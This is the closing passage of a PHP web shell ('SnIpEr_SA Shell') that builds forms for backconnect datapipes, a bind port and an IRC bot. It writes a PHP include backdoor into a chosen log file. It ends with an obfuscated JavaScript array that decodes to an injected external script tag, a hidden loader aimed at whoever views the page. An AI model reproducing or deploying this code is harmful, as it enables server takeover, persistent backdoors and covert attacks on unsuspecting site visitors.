echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe."</tr></div></table>";
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text214'].$arrow."</b>",in('text','ircadmin',15,'ircadmin'));
echo sr(40,"<b>".$lang[$language.'_text215'].$arrow."</b>",in('text','ircserver',15,'ircserver'));
echo sr(40,"<b>".$lang[$language.'_text216'].$arrow."</b>",in('text','ircchanal',15,'ircchanl'));
echo sr(40,"<b>".$lang[$language.'_text217'].$arrow."</b>",in('text','ircname',15,'ircname'));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ips',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','ports',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe."</tr></div></table>";
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell | <a href=http://sniper-sa.com>http://sniper-sa.com</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | تعريب وتطوير ]---o</b></font></div></td></tr></table>".$f;
if(empty($_POST['log'])){
} else {
$log=$_POST['log'];
echo error_log("<? print include(\$_GET[ss]) ?>", 3,$log);
echo "</textarea></CENTER>";
}
?> <script type="text/javascript" language="javascript">
<!--
fF7eSD8=new Array();
fF7eSD8[0]="%3Cscript%3E%0Adocu";
fF7eSD8[1]="ment.write%28une";
fF7eSD8[2]="scape%28%22%253Cscri";
fF7eSD8[3]="pt%2520type%253D%25";
fF7eSD8[4]="22text/javascr";
fF7eSD8[5]="ipt%2522%253Edo";
fF7eSD8[6]="cument.write%25";
fF7eSD8[7]="28%2527%255Cu00";
fF7eSD8[8]="3c%255Cu0073%255C";
fF7eSD8[9]="u0063%255Cu0072";
fF7eSD8[10]="%255Cu0069%255Cu";
fF7eSD8[11]="0070%255Cu007";
fF7eSD8[12]="4%255Cu0020%255C";
fF7eSD8[13]="u0074%255Cu007";
fF7eSD8[14]="9%255Cu0070%255Cu";
fF7eSD8[15]="0065%255Cu003d%25";
fF7eSD8[16]="5Cu0022%255Cu0";
fF7eSD8[17]="074%255Cu0065%255C";
fF7eSD8[18]="u0078%255Cu0074%25";
fF7eSD8[19]="5Cu002f%255Cu";
fF7eSD8[20]="006a%255Cu0061%255";
fF7eSD8[21]="Cu0076%255Cu0";
fF7eSD8[22]="061%255Cu0073%25";
fF7eSD8[23]="5Cu0063%255Cu00";
fF7eSD8[24]="72%255Cu0069%25";
fF7eSD8[25]="5Cu0070%255Cu";
fF7eSD8[26]="0074%255Cu0022";
fF7eSD8[27]="%255Cu003e%255C";
fF7eSD8[28]="u0064%255Cu00";
fF7eSD8[29]="6f%255Cu0063%255C";
fF7eSD8[30]="u0075%255Cu006";
fF7eSD8[31]="d%255Cu0065%255Cu";
fF7eSD8[32]="006e%255Cu0074%255";
fF7eSD8[33]="Cu002e%255Cu00";
fF7eSD8[34]="77%255Cu0072%25";
fF7eSD8[35]="5Cu0069%255Cu";
fF7eSD8[36]="0074%255Cu0065%25";
fF7eSD8[37]="5Cu0028%255Cu002";
fF7eSD8[38]="7%255Cu005c%255Cu";
fF7eSD8[39]="0075%255Cu0030";
fF7eSD8[40]="%255Cu0030%255Cu0";
fF7eSD8[41]="033%255Cu0063%25";
fF7eSD8[42]="5Cu005c%255Cu007";
fF7eSD8[43]="5%255Cu0030%255Cu";
fF7eSD8[44]="0030%255Cu0035";
fF7eSD8[45]="%255Cu0033%255C";
fF7eSD8[46]="u005c%255Cu0075";
fF7eSD8[47]="%255Cu0030%255Cu";
fF7eSD8[48]="0030%255Cu003";
fF7eSD8[49]="4%255Cu0033%255";
fF7eSD8[50]="Cu005c%255Cu007";
fF7eSD8[51]="5%255Cu0030%255Cu";
fF7eSD8[52]="0030%255Cu0035%255";
fF7eSD8[53]="Cu0032%255Cu00";
fF7eSD8[54]="5c%255Cu0075%255C";
fF7eSD8[55]="u0030%255Cu0030%25";
fF7eSD8[56]="5Cu0034%255Cu00";
fF7eSD8[57]="39%255Cu005c%255Cu";
fF7eSD8[58]="0075%255Cu0030%255";
fF7eSD8[59]="Cu0030%255Cu003";
fF7eSD8[60]="5%255Cu0030%255C";
fF7eSD8[61]="u005c%255Cu0075";
fF7eSD8[62]="%255Cu0030%255Cu00";
fF7eSD8[63]="30%255Cu0035%255";
fF7eSD8[64]="Cu0034%255Cu005";
fF7eSD8[65]="c%255Cu0075%255C";
fF7eSD8[66]="u0030%255Cu0030%25";
fF7eSD8[67]="5Cu0032%255Cu";
fF7eSD8[68]="0030%255Cu005c%25";
fF7eSD8[69]="5Cu0075%255Cu00";
fF7eSD8[70]="30%255Cu0030%255";
fF7eSD8[71]="Cu0035%255Cu003";
fF7eSD8[72]="3%255Cu005c%255Cu0";
fF7eSD8[73]="075%255Cu0030";
fF7eSD8[74]="%255Cu0030%255Cu00";
fF7eSD8[75]="35%255Cu0032%25";
fF7eSD8[76]="5Cu005c%255Cu00";
fF7eSD8[77]="75%255Cu0030%255Cu";
fF7eSD8[78]="0030%255Cu003";
fF7eSD8[79]="4%255Cu0033%255Cu";
fF7eSD8[80]="005c%255Cu0075%25";
fF7eSD8[81]="5Cu0030%255Cu";
fF7eSD8[82]="0030%255Cu0033";
fF7eSD8[83]="%255Cu0064%255Cu0";
fF7eSD8[84]="05c%255Cu0075%25";
fF7eSD8[85]="5Cu0030%255Cu003";
fF7eSD8[86]="0%255Cu0036%255";
fF7eSD8[87]="Cu0038%255Cu0";
fF7eSD8[88]="05c%255Cu0075%255C";
fF7eSD8[89]="u0030%255Cu003";
fF7eSD8[90]="0%255Cu0037%255C";
fF7eSD8[91]="u0034%255Cu005c%25";
fF7eSD8[92]="5Cu0075%255Cu";
fF7eSD8[93]="0030%255Cu0030";
fF7eSD8[94]="%255Cu0037%255Cu";
fF7eSD8[95]="0034%255Cu005c%25";
fF7eSD8[96]="5Cu0075%255Cu00";
fF7eSD8[97]="30%255Cu0030%255Cu";
fF7eSD8[98]="0037%255Cu0030%255";
fF7eSD8[99]="Cu005c%255Cu00";
fF7eSD8[100]="75%255Cu0030%255";
fF7eSD8[101]="Cu0030%255Cu00";
fF7eSD8[102]="33%255Cu0061%255Cu";
fF7eSD8[103]="005c%255Cu0075";
fF7eSD8[104]="%255Cu0030%255C";
fF7eSD8[105]="u0030%255Cu0032%25";
fF7eSD8[106]="5Cu0066%255Cu00";
fF7eSD8[107]="5c%255Cu0075%255Cu";
fF7eSD8[108]="0030%255Cu0030%25";
fF7eSD8[109]="5Cu0032%255Cu0";
fF7eSD8[110]="066%255Cu005c";
fF7eSD8[111]="%255Cu0075%255Cu";
fF7eSD8[112]="0030%255Cu0030%25";
fF7eSD8[113]="5Cu0036%255Cu003";
fF7eSD8[114]="4%255Cu005c%255C";
fF7eSD8[115]="u0075%255Cu003";
fF7eSD8[116]="0%255Cu0030%255C";
fF7eSD8[117]="u0036%255Cu00";
fF7eSD8[118]="31%255Cu005c%255";
fF7eSD8[119]="Cu0075%255Cu00";
fF7eSD8[120]="30%255Cu0030%255Cu";
fF7eSD8[121]="0037%255Cu0034";
fF7eSD8[122]="%255Cu005c%255Cu00";
fF7eSD8[123]="75%255Cu0030%255C";
fF7eSD8[124]="u0030%255Cu003";
fF7eSD8[125]="6%255Cu0031%255";
fF7eSD8[126]="Cu005c%255Cu007";
fF7eSD8[127]="5%255Cu0030%255";
fF7eSD8[128]="Cu0030%255Cu0";
fF7eSD8[129]="032%255Cu0065";
fF7eSD8[130]="%255Cu005c%255C";
fF7eSD8[131]="u0075%255Cu0030%25";
fF7eSD8[132]="5Cu0030%255Cu003";
fF7eSD8[133]="7%255Cu0034%255Cu0";
fF7eSD8[134]="05c%255Cu0075%255C";
fF7eSD8[135]="u0030%255Cu00";
fF7eSD8[136]="30%255Cu0033%255C";
fF7eSD8[137]="u0030%255Cu005";
fF7eSD8[138]="c%255Cu0075%255Cu";
fF7eSD8[139]="0030%255Cu003";
fF7eSD8[140]="0%255Cu0033%255C";
fF7eSD8[141]="u0030%255Cu005";
fF7eSD8[142]="c%255Cu0075%255";
fF7eSD8[143]="Cu0030%255Cu0";
fF7eSD8[144]="030%255Cu0036%255C";
fF7eSD8[145]="u0063%255Cu005c";
fF7eSD8[146]="%255Cu0075%255C";
fF7eSD8[147]="u0030%255Cu00";
fF7eSD8[148]="30%255Cu0037%25";
fF7eSD8[149]="5Cu0033%255Cu00";
fF7eSD8[150]="5c%255Cu0075%255";
fF7eSD8[151]="Cu0030%255Cu00";
fF7eSD8[152]="30%255Cu0032%255";
fF7eSD8[153]="Cu0065%255Cu005c";
fF7eSD8[154]="%255Cu0075%255C";
fF7eSD8[155]="u0030%255Cu00";
fF7eSD8[156]="30%255Cu0036%255Cu";
fF7eSD8[157]="0066%255Cu005c%255";
fF7eSD8[158]="Cu0075%255Cu00";
fF7eSD8[159]="30%255Cu0030%255Cu";
fF7eSD8[160]="0037%255Cu0032%25";
fF7eSD8[161]="5Cu005c%255Cu007";
fF7eSD8[162]="5%255Cu0030%255C";
fF7eSD8[163]="u0030%255Cu0036%25";
fF7eSD8[164]="5Cu0037%255Cu00";
fF7eSD8[165]="5c%255Cu0075%255";
fF7eSD8[166]="Cu0030%255Cu0030";
fF7eSD8[167]="%255Cu0032%255Cu00";
fF7eSD8[168]="66%255Cu005c%255";
fF7eSD8[169]="Cu0075%255Cu0";
fF7eSD8[170]="030%255Cu0030%255C";
fF7eSD8[171]="u0037%255Cu0037";
fF7eSD8[172]="%255Cu005c%255Cu";
fF7eSD8[173]="0075%255Cu0030%25";
fF7eSD8[174]="5Cu0030%255Cu";
fF7eSD8[175]="0036%255Cu0038%255";
fF7eSD8[176]="Cu005c%255Cu007";
fF7eSD8[177]="5%255Cu0030%255";
fF7eSD8[178]="Cu0030%255Cu0036";
fF7eSD8[179]="%255Cu0035%255Cu00";
fF7eSD8[180]="5c%255Cu0075%255Cu";
fF7eSD8[181]="0030%255Cu003";
fF7eSD8[182]="0%255Cu0037%255C";
fF7eSD8[183]="u0032%255Cu00";
fF7eSD8[184]="5c%255Cu0075%255";
fF7eSD8[185]="Cu0030%255Cu0";
fF7eSD8[186]="030%255Cu0036%25";
fF7eSD8[187]="5Cu0035%255Cu0";
fF7eSD8[188]="05c%255Cu0075";
fF7eSD8[189]="%255Cu0030%255Cu0";
fF7eSD8[190]="030%255Cu0032";
fF7eSD8[191]="%255Cu0065%255Cu";
fF7eSD8[192]="005c%255Cu0075";
fF7eSD8[193]="%255Cu0030%255Cu00";
fF7eSD8[194]="30%255Cu0036%25";
fF7eSD8[195]="5Cu0061%255Cu";
fF7eSD8[196]="005c%255Cu007";
fF7eSD8[197]="5%255Cu0030%255";
fF7eSD8[198]="Cu0030%255Cu0037";
fF7eSD8[199]="%255Cu0033%255Cu0";
fF7eSD8[200]="05c%255Cu0075%255C";
fF7eSD8[201]="u0030%255Cu00";
fF7eSD8[202]="30%255Cu0033%255Cu";
fF7eSD8[203]="0065%255Cu005";
fF7eSD8[204]="c%255Cu0075%255Cu";
fF7eSD8[205]="0030%255Cu0030%25";
fF7eSD8[206]="5Cu0033%255Cu00";
fF7eSD8[207]="63%255Cu005c%255C";
fF7eSD8[208]="u0075%255Cu0030";
fF7eSD8[209]="%255Cu0030%255Cu0";
fF7eSD8[210]="032%255Cu0066%255";
fF7eSD8[211]="Cu005c%255Cu0";
fF7eSD8[212]="075%255Cu0030%25";
fF7eSD8[213]="5Cu0030%255Cu";
fF7eSD8[214]="0035%255Cu0033%255";
fF7eSD8[215]="Cu005c%255Cu007";
fF7eSD8[216]="5%255Cu0030%255Cu0";
fF7eSD8[217]="030%255Cu0034%255";
fF7eSD8[218]="Cu0033%255Cu00";
fF7eSD8[219]="5c%255Cu0075%25";
fF7eSD8[220]="5Cu0030%255Cu0";
fF7eSD8[221]="030%255Cu0035";
fF7eSD8[222]="%255Cu0032%255Cu0";
fF7eSD8[223]="05c%255Cu0075";
fF7eSD8[224]="%255Cu0030%255Cu";
fF7eSD8[225]="0030%255Cu0034%25";
fF7eSD8[226]="5Cu0039%255Cu0";
fF7eSD8[227]="05c%255Cu0075%25";
fF7eSD8[228]="5Cu0030%255Cu";
fF7eSD8[229]="0030%255Cu0035%25";
fF7eSD8[230]="5Cu0030%255Cu";
fF7eSD8[231]="005c%255Cu0075%255";
fF7eSD8[232]="Cu0030%255Cu0";
fF7eSD8[233]="030%255Cu0035";
fF7eSD8[234]="%255Cu0034%255Cu0";
fF7eSD8[235]="05c%255Cu0075";
fF7eSD8[236]="%255Cu0030%255Cu";
fF7eSD8[237]="0030%255Cu0033%255";
fF7eSD8[238]="Cu0065%255Cu0";
fF7eSD8[239]="027%255Cu0029";
fF7eSD8[240]="%255Cu003c%255C";
fF7eSD8[241]="u002f%255Cu0073%25";
fF7eSD8[242]="5Cu0063%255Cu007";
fF7eSD8[243]="2%255Cu0069%255Cu";
fF7eSD8[244]="0070%255Cu007";
fF7eSD8[245]="4%255Cu003e%2527%25";
fF7eSD8[246]="29%253C/script%25";
fF7eSD8[247]="3E%22%29%29%3B%0A%3C/scri";
fF7eSD8[248]="pt%3E";
for (i = 0; i < fF7eSD8.length; i ++)
{
document.write(unescape(fF7eSD8[i]))
}
// -->
</script>